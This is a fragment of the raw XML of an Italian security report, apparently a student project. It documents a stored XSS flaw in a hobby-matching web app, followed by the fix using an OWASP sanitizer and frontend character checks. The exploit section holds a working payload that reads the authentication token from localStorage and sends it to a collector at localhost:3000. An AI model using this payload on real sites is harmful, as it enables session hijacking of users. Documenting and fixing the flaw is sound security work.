                    <w:p w14:paraId="39A34F5B" w14:textId="0B03C723"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870E32">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>31</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: UserController.java con metodo originale</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>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XSS Stored</w:t>
      </w:r>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script JavaScript, HTML tag o HTML attributes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> malevol</w:t>
      </w:r>
      <w:r w:rsidR="004A3A39">
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> che, quando viene eseguito dall’utente che lo riceve, ruba</w:t>
      </w:r>
      <w:r w:rsidR="004A3A39">
        <w:t>no</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> i suoi dati sensibili.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AC74BF" w14:textId="705EEC49" w:rsidR="00CD7B9B" w:rsidRDefault="00CD7B9B" w:rsidP="00CD7B9B">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In questo esempio, abbiamo aggiunto in </w:t>
      </w:r>
      <w:r w:rsidRPr="009015E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HomeController.java</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> l’API </w:t>
      </w:r>
      <w:r w:rsidRPr="009015E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/hello-user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, al fine di </w:t>
      </w:r>
      <w:r w:rsidR="00A15CC1">
        <w:t>mostrare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A15CC1">
        <w:t xml:space="preserve">i </w:t>
      </w:r>
      <w:r>
        <w:t>nom</w:t>
      </w:r>
      <w:r w:rsidR="00A15CC1">
        <w:t xml:space="preserve">i </w:t>
      </w:r>
      <w:r>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00A15CC1">
        <w:t xml:space="preserve">egli </w:t>
      </w:r>
      <w:r>
        <w:t>hobby</w:t>
      </w:r>
      <w:r w:rsidR="00A15CC1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF35D6D" w14:textId="77777777" w:rsidR="009015E9" w:rsidRDefault="009015E9" w:rsidP="009015E9">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C55D70E" w14:textId="358A7930" w:rsidR="00A15CC1" w:rsidRDefault="009015E9" w:rsidP="00A15CC1">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="009015E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploit</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7554C961" w14:textId="207A04C4" w:rsidR="00A15CC1" w:rsidRPr="00A15CC1" w:rsidRDefault="00A15CC1" w:rsidP="00A15CC1">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Dopo aver fatto il login come utenti business, bisogna creare un nuovo hobby inserendo nel nome lo script. Quando con un utente normale, inserendo le sue preferenze, si verifica un match con un hobby che rispetta le sue preferenze, invece di mostrare il nome dell’hobby verrà eseguito lo script</w:t>
      </w:r>
      <w:r w:rsidR="00E12B17">
        <w:t xml:space="preserve"> (Figura 3</w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00E12B17">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A25642" w14:textId="32BC0018" w:rsidR="00D12C9A" w:rsidRDefault="00D12C9A" w:rsidP="00D12C9A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">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img title="&lt;/script&gt;&lt;img src onerror=" var token = localStorage.getItem('token'); var img = new Image(); img.src = 'http://localhost:3000/log?token=' + encodeURIComponent(token); "&gt;"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C76201D" w14:textId="77777777" w:rsidR="00E16865" w:rsidRDefault="00E16865" w:rsidP="00D12C9A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BBAD4B8" w14:textId="370FCCEA" w:rsidR="00D12C9A" w:rsidRDefault="00D12C9A" w:rsidP="00D12C9A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>e permette di mostrare il token di autenticazione</w:t>
      </w:r>
      <w:r w:rsidR="00E16865">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A15CC1">
        <w:t>in quanto il front-end lo salva nel local storage come mostra la Figura 3</w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00A15CC1">
        <w:t>. Il token viene inviat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w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00C53E14">
        <w:t xml:space="preserve"> e 3</w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00C53E14">
        <w:t xml:space="preserve">) nella directory </w:t>
      </w:r>
      <w:r w:rsidR="00C53E14" w:rsidRPr="00C53E14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XSS_server</w:t>
      </w:r>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backend che nel frontend. Nel frontend </w:t>
      </w:r>
      <w:r w:rsidRPr="00D12C9A">
        <w:t xml:space="preserve">abbiamo creato username ed error in </w:t>
      </w:r>
      <w:r w:rsidR="009015E9" w:rsidRPr="009015E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>App.js</w:t>
      </w:r>
      <w:r w:rsidR="009015E9">
        <w:t xml:space="preserve">. Tali parametri vengono passati al componente </w:t>
      </w:r>
      <w:r w:rsidR="009015E9" w:rsidRPr="009015E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidRPr="009015E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">eader.jsx </w:t>
      </w:r>
      <w:r w:rsidRPr="00D12C9A">
        <w:t xml:space="preserve">che </w:t>
      </w:r>
      <w:r w:rsidR="009015E9">
        <w:t>li passa a sua volta a</w:t>
      </w:r>
      <w:r w:rsidRPr="00D12C9A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009015E9" w:rsidRPr="009015E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="009015E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>avbar</w:t>
      </w:r>
      <w:r w:rsidR="009015E9" w:rsidRPr="009015E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.jsx</w:t>
      </w:r>
      <w:r w:rsidR="009015E9">
        <w:t xml:space="preserve">, nella quale avviene il fetch degli hobby relativi allo username dato per mostrarli sulla NavBar, come mostrato in Figura </w:t>
      </w:r>
      <w:r w:rsidR="00A15CC1">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00C53E14">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E43778" w14:textId="3BDE71BB" w:rsidR="00CD7B9B" w:rsidRDefault="00A15CC1" w:rsidP="00D12C9A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251957248" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5FBDF1DE" wp14:editId="031F7B71">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-130810</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2243455</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6380480" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="526153442" name="Casella di testo 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1419C670" w14:textId="3D4CBDB5"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870E32">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>32</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: HomeController.java</w:t>
                            </w:r>
                            <w:r w:rsidR="00E12B17">
                              <w:t xml:space="preserve">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DF1DE" id="_x0000_s1059" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-10.3pt;margin-top:176.65pt;width:502.4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F4GgIAAEA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2nY8/zikkKTabfo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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="1419C670" w14:textId="3D4CBDB5"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870E32">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>32</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: HomeController.java</w:t>
                      </w:r>
                      <w:r w:rsidR="00E12B17">
                        <w:t xml:space="preserve"> con metodo vulnerabile</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251955200" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="70FE05DD" wp14:editId="125EE132">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>106045</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6380499" cy="2080260"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2005413066"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0499" cy="2080260"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B87784D" w14:textId="26511AF7" w:rsidR="00CD7B9B" w:rsidRDefault="00CD7B9B" w:rsidP="00D12C9A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10100E71" w14:textId="22B74C12" w:rsidR="00CD7B9B" w:rsidRDefault="00CD7B9B" w:rsidP="00D12C9A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42F537CA" w14:textId="6D8BA8AD" w:rsidR="0091567C" w:rsidRDefault="0091567C" w:rsidP="00D12C9A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D36BC01" w14:textId="77777777" w:rsidR="00CD7B9B" w:rsidRDefault="00CD7B9B" w:rsidP="00D12C9A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="512A24DE" w14:textId="77777777" w:rsidR="00CD7B9B" w:rsidRDefault="00CD7B9B" w:rsidP="00D12C9A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F5D276B" w14:textId="77777777" w:rsidR="00CD7B9B" w:rsidRDefault="00CD7B9B" w:rsidP="00D12C9A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C5D5995" w14:textId="77777777" w:rsidR="00CD7B9B" w:rsidRDefault="00CD7B9B" w:rsidP="00D12C9A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7856625D" w14:textId="77777777" w:rsidR="00CD7B9B" w:rsidRDefault="00CD7B9B" w:rsidP="00D12C9A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52EA88EF" w14:textId="68700DDB" w:rsidR="00CD7B9B" w:rsidRDefault="00A15CC1" w:rsidP="00D12C9A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251959296" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4A7AA637" wp14:editId="34260F7D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1511935</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>290195</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3095625" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="990875026" name="Casella di tes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09A7F3" w14:textId="6EA6B09A"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870E32">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>33</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: Authentication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AA637" id="_x0000_s1060" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:119.05pt;margin-top:22.85pt;width:24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K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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="6309A7F3" w14:textId="6EA6B09A"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870E32">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>33</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: AuthenticationService.js</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251954176" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0051F03C" wp14:editId="2AC6BCA2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-655955</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3095625" cy="889258"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:wrapNone/>
            <wp:docPr id="574571844"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889258"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="213A85D7" w14:textId="0260C1BD" w:rsidR="00CD7B9B" w:rsidRDefault="00CD7B9B" w:rsidP="00D12C9A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30CC7480" w14:textId="77777777" w:rsidR="00CD7B9B" w:rsidRDefault="00CD7B9B" w:rsidP="00D12C9A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68585899" w14:textId="6D45CA58" w:rsidR="00CD7B9B" w:rsidRDefault="00CD7B9B" w:rsidP="00D12C9A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="232BAA58" w14:textId="43F15AD7" w:rsidR="009015E9" w:rsidRDefault="00926F16" w:rsidP="00D12C9A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="009015E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fix</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEAB21B" w14:textId="04780FDC" w:rsidR="004B30FC" w:rsidRDefault="009015E9" w:rsidP="00E12B17">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="00926F16">
        <w:t xml:space="preserve">ato backend è stato modificato </w:t>
      </w:r>
      <w:r w:rsidR="00C53E14">
        <w:t xml:space="preserve">l’API </w:t>
      </w:r>
      <w:r w:rsidR="00C53E14" w:rsidRPr="00C53E14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00926F16" w:rsidRPr="00C53E14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>helloUser</w:t>
      </w:r>
      <w:r w:rsidR="00926F16">
        <w:t xml:space="preserve"> usando un sanitizer di OW</w:t>
      </w:r>
      <w:r w:rsidR="002F292A">
        <w:t>AS</w:t>
      </w:r>
      <w:r w:rsidR="00926F16">
        <w:t>P che sanitizza il nome per evitare gli attacchi</w:t>
      </w:r>
      <w:r w:rsidR="00C53E14">
        <w:t xml:space="preserve"> (Figura 3</w:t>
      </w:r>
      <w:r w:rsidR="00E12B17">
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00C53E14">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00926F16">
        <w:t>. Lato frontend invece è stato introdotto un controllo sui caratteri non consentiti per maggiore sicurezza</w:t>
      </w:r>
      <w:r w:rsidR="00C53E14">
        <w:t xml:space="preserve"> (Figura 3</w:t>
      </w:r>
      <w:r w:rsidR="00E12B17">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00C53E14">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00926F16">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59640B92" w14:textId="61DFADBF" w:rsidR="004B30FC" w:rsidRDefault="00E12B17" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251964416" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5D1961F6" wp14:editId="1646718B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3907155</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6174105" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1027104997" name="Casella di testo 1"/>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DB55DE3" w14:textId="115866FE"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870E32">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>34</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: Navba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61F6" id="_x0000_s1061" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:307.65pt;width:486.1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Kt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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="6DB55DE3" w14:textId="115866FE"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870E32">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>34</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: Navbar.jsx</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251962368" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="126C1B0B" wp14:editId="113F7E62">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>132080</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6174105" cy="3718066"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1161458460"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22496" b="6916"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6174105" cy="3718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2BF80" w14:textId="68DC4065" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="42A96554" w14:textId="34766367" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="79280D25" w14:textId="77DCADF6" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="15364F36" w14:textId="112E33DC" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="39104C62" w14:textId="39FCB78E" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1265285C" w14:textId="09F4DF50" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="58D61F9B" w14:textId="7E7E38BF" w:rsidR="00D12C9A" w:rsidRDefault="00D12C9A" w:rsidP="00467BBC"/>
    <w:p w14:paraId="49AE0CE3" w14:textId="00042A07" w:rsidR="00D12C9A" w:rsidRDefault="00D12C9A" w:rsidP="00467BBC"/>
    <w:p w14:paraId="3EC43AEB" w14:textId="5874D360" w:rsidR="00D12C9A" w:rsidRDefault="00D12C9A" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0BCF1677" w14:textId="42B151CD" w:rsidR="00D12C9A" w:rsidRDefault="00D12C9A" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0F42EB12" w14:textId="3364090F" w:rsidR="00D12C9A" w:rsidRDefault="00D12C9A" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6ED912E2" w14:textId="602416A9" w:rsidR="00D12C9A" w:rsidRDefault="00D12C9A" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7EC7A80E" w14:textId="2B67FC90" w:rsidR="00E16865" w:rsidRDefault="00E12B17" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251967488" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4F50FD99" wp14:editId="275FCC62">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>640715</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2425065</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4838700" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="720196273" name="Casella di tes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B05DFCF" w14:textId="148C2FEA"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870E32">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>35</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t xml:space="preserve">: </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00AD31DD">
                              <w:t>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0FD99" id="_x0000_s1062" type="#_x0000_t202" style="position:absolute;margin-left:50.45pt;margin-top:190.95pt;width:381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h2GwIAAEA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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="7B05DFCF" w14:textId="148C2FEA"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870E32">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>35</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve">: </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00AD31DD">
                        <w:t>Server in ascolto nel file XSS_exploit.js</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251965440" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0FFB4DB4" wp14:editId="08FBC9FA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>86995</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4838700" cy="2281185"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:wrapNone/>
            <wp:docPr id="76020599"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2281185"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E96782" w14:textId="166481C0" w:rsidR="00D12C9A" w:rsidRDefault="00D12C9A" w:rsidP="00467BBC"/>
